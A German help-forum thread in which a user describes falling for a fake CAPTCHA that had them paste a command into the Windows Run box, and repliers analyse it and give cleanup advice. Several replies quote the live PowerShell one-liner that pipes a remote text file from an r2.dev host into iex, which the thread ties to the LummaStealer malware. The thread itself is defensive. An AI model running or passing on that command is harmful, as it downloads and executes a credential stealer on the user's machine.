Wurde ich gehackt (laptop)?
eigentlich wollte ich die seite meiner schule aufrufen und habe direkt die adresse eingegeben bei google. Unaufmerksam fiel mir nicht auf, dass ich aufgefordert wurde zu verifizieren, dass ich kein roboter bin. Was ich nie musste. Dazu musste ich windows +r drücken und ins ausführen fenster ctrl+v drücken. Darein wurde glaube ich also der website link oder ähnliches kopiert, dann sollte ich enter drücken. habe ich getan aber es kam eine fehlermeldung. Erst dann fiel mir auf das ich auf der falsche website war und hab alles geschlossen. Wenn mir jemand sagen könnte, ob dieses windows r etc. Gefährlich sein könnte oder ich evtl. gehackt wurde, wäre ich sehr dankbar.
4 Antworten
Yep,
das ist aktuell eine häufige Methode. Windows + R öffnet das "Ausführen" fenster und mit Strg + V fügst du befehle ein, die dir die Webseite in deine Zwischenablage getan hat. Dann werden diese Befehle ausgeführt.
Demnach kannst du davon ausgehen, dass du in irgendeiner Art infiziert worden bist. Bitte nutze einen Virenscanner und scanne gründlich das gesamte System, für sowas wäre unter anderem Malwarebytes nutzbar sobald der Windows Defender nichts erkannt hat. Nach möglichkeit solltest du nach der Installation des Virenscanners auch den Internetzugriff deines betroffenen Gerätes ausstellen und dann in ruhe scannen.
Wenn nichts gefunden wurde, sicher all deine Daten vom PC die wichtig sind und erwäge die Neuinstallation von Windows, hierbei gibt es einige Anleitungen im Internet. Anderweitig kannst du dich auch zur Frage "Virenbefall - Was tun?" im Internet schlau machen.
Du solltest mit einem unabhängigen Gerät auch die Passwörter deiner Accounts ändern, hierbei am besten zuerst mit deinem E-Mail Account anfangen, dadurch wird auch eine aktive Sitzung von deinem PC ungültig gemacht.
Ja, ich weiß nicht wie der Google link zustande kommt, das kann vielleicht dadurch kommen das du das irgendwie komisch kopiert hast, auf jeden fall downloaded er eine Textdatei und lässt die als Powershell (Windows Kommandozeile) ausführen. Demnach ist dort vermutlich schädlicher Code vorhanden.
Laut VirusTotal wird er (aktuell) nur von 2 Antivirenscannern erkannt (Avast und AVG, basieren beide auf der gleichen Engine)
https://www.virustotal.com/gui/file/c6767163631caddbc9a1e2c102ec23c4d9750df3f81b1afc1fb1222a02111b8a
Danke dir habe mir avast free runtergeladen er hat bisher nichts erkannt, bei mir kam auch eine fehlermeldung nach dem ich den komischen link einfügte. Etwa keine berechtigung, also kein erfolg beim einfügen und enter, hoffe ich zumindest. Vielen dank für deine recherche
Achso, dann wurde das vielleicht nicht ausgeführt mit glück. Trotzdem wüde ich wachsam bleiben, falls doch was herunterladen wurde.
Der Google link allgemein ist nicht schädlich, wenn es das ist was du wirklich ausgeführt hast. Das was dahinter aber ist das mit curl etc., das ist malware. Ich hab das was da hinter ist dekodiert, da das durch den Google link URL encoded war, was da basically passiert ist, dass er von seite X code holt und diesen ausführt. Und den Code von seite X hab ich dort bei VirusTotal hochgeladen.
Was du wirklich eingefügt hast kann ich nicht beantworten und ob das nun ausgeführt wurde oder nicht. Eine Fehlermeldung kann natürlich bedeuten, dass da etwas nicht erfolgreich war. Aber darauf kann man sich auch nicht unbdingt verlassen, also für den Fall würde ich wachsam bleiben ob irgendwie weiteres ungewöhnliches passiert.
Hab nochmal die zipzig.txt von der er zuerst den Code holt analysiert, der downloadet damit als 2. Schritt eine "LVote.exe", welche von bereits mehreren Antivirensoftwares erkannt wird https://www.virustotal.com/gui/file/39131c0eb9b63df7b8881337f575a61af74de6708cad63377863712363eedb56
Um genau zu sein handelt es sich hierbei um eine bekannte Stealer variante namens "LummaStealer", welche aktuell viel im umlauf ist.
Wie ich aus den anderen Antworten lese gab es auch eine Meldung vom Windows Defender, heißt vermutlich wurde das blockiert. Ich hatte den befehl auch nochmal bei VirusTotal reingepackt und dort wurde dieser vom Defender erkannt. Würde also Sinn ergeben, dass es dann eine Fehlermeldung gab, weil das eben blockiert wurde.
Spätestens bei der Eingabeaufforderung, also bei Regedit wäre ich misstrauisch geworden:
Das ist nämlich dazu da, um die Einstellungen des Laptops bzw. des Betriebssystems grundlegend zu ändern.
Da wirst jetzt zu einem PC-Doktor gehen müssen, damit er sich anguckt, was genau der Hacker bei dir verändert hat. Denn meist wird der Hacker wohl Sicherheitsprogramme und den Spywareschutz abgeschaltet haben.
Warum gehst du random Aufforderungen nach auf deinem Pc freiwillig Zeugs über die Commandozeile zu installieren???
Hast du in die Kommandozeile das:
powershell -w h powershell 'curl https://pub-a8f40818a34d44c886fbf242401c8141.r2.dev/zipzig.txt | iex'#Ray ID 6754 - Verify
oder das:
…eingegeben?
Ersteres wäre ein valider Befehl dir irgendeine ZIP [korrigiere: irgendeine Text Datei] von Cloudflare (einem Hosting Dienst) runterzuladen und in der Powershell in Hintergrund auszuführen. Zweiteres erzeugt zu deinem Glück nur eine Fehlermeldung.
Und von welcher Seite genau kam das Pop-up?
War extrem unaufmerksam, unglaublich. Ich habe ctrl v gedrückt ohne vorher was zu kopieren, womöglich war es ohne google davor und dieses google kam evtl weil ich im verlauf glaube ich geschaut habe was ich kopiert habe. Ich kam auf diese komische seiite weil ich nanoo. Tv eingeben habe, ist eigentlich website von meiner schule für filme, aber die adresse lautet eigentlicj nicht ganz so, was mir zu spät aufgefallen ist.
Tatsächlich kam nachdem ich enter gedrückt habe eine fehlermeldung, in etwa keine berechtigung und eine meldung von windows defender, glaube er hat eingegriffen bin mir aber nicht mehr sicher habe es schnell weggecklickt. Antiviren programme finden bislang nichts hoffe das stimmt so
Was für eine Fehlermeldung wurde denn ausgegeben? Normalerweise kommt noch eine Aufforderung zu bestätigen dass man Code von einer Fremden Quelle ausführen will. Und evt. hast du gar nicht die Rechte dazu.
nanoo. Tv ist jetzt die richtige Adresse. Hast du im Browser Verlauf noch die auf der du wirklich gelandet bist? Oder wurdest du weitergeleitet?
Ja, ok. Dann hat sich meine Frage im letztem Kommi erledigt. Allerdings könnte es auch sein, dass du Adware bzw. einen Browser Hijacker bereits installiert hattest und du dadurch auf fremde Seiten weitergeleitet wirst. Von manchen Av‘s wird sowas nicht als schädlich sondern nur potentiell unerwünscht eingestuft oder erst gar nicht erkannt.
Ich habe wahrscheinlich nanno mit doppel n geschrieben, auf jeden fall sieht man das nicht im verlauf , sondern .. loading.. 867358.intuitlens.co, dann ..loading.. hitnspinpromo.com, später verify your request pub-a5d7fdd3aa9b494b88125ff1cef2effc.r2.dev
Ja, nanno. tv leitet Nutzer auf ‚fragwürdige’ werbe Seiten weiter und sammelt Informationen über Betriebsystem und Browser der Besucher. Also wird darüber auch versucht spezifische Malware zu verbreiten.
Scheint plausibel, dass du nur durch vertippen darauf gelandet bist.
Lösch am besten Cookies & Browser Cache und installier dir evt. einen Adblocker oder Browser die solche Weiterleitungen verhindern können (wie U-Block Origin, oder Brave Browser). Aber aus sicheren Quellen. (https://brave.com/de/, https://addons.mozilla.org/de/firefox/addon/ublock-origin/)
Danke dir vielmals, ich habe jetzt im schutzverlauf von windows defender gesehen, dass eine schwerwiegende Bedrohung blockiert wurde, demnach habe ich glaub ich glück gehabt und nichts wurde heruntergeladen. Danke dir nochmals, ich werde deine Empfehlung umsetzen
Und denk vor allem immer nach, bevor du etwas anklickst. Damit lässt sich schon das meiste verhindern. ;)
was genau hast du bei ausführen eingegeben win r öffnet das ausführen Befehlsfenster.
Eine normale Website fordert dich niemals auf etwas im windows einzugeben und sowieso pauschal direkt nein sagen.
ich war sehr unaufmerksam. Ich habe einfach ctrl +v gedrückt, eingegeben wurde ein link : https://www.google.com/search?q=powershell+-w+h+powershell+%27curl+https%3A%2F%2Fpub-a8f40818a34d44c886fbf242401c8141.r2.dev%2Fzipzig.txt+%7C+iex%27%23Ray+ID+6754+-+Verify&oq=powershell+-w+h+powershell+%27curl+https%3A%2F%2Fpub-a8f40818a34d44c886fbf242401c8141.r2.dev%2Fzipzig.txt+%7C+iex%27%23Ray+ID+6754+-+Verify&gs_lcrp=EgZjaHJvbWUyBggAEEUYOdIBBzU5OGowajeoAgCwAgA&sourceid=chrome&ie=UTF-8#vhid=WcZzvUxBhRriIM&vssid=_AJX5Z5qFDKWNxc8PwbrF6QU_37
wenn du nur den google link so wie im kommi eingegeben hast kann dein win nix damit anfangen weils keine https google links benutzt
Danke dir, könntest du dir vielleicht den link unter einer antwort eines anderen fragestellers anschauen. Vielleicht erkennst du was genaueres dahinter. Wäre dir sehr dankbar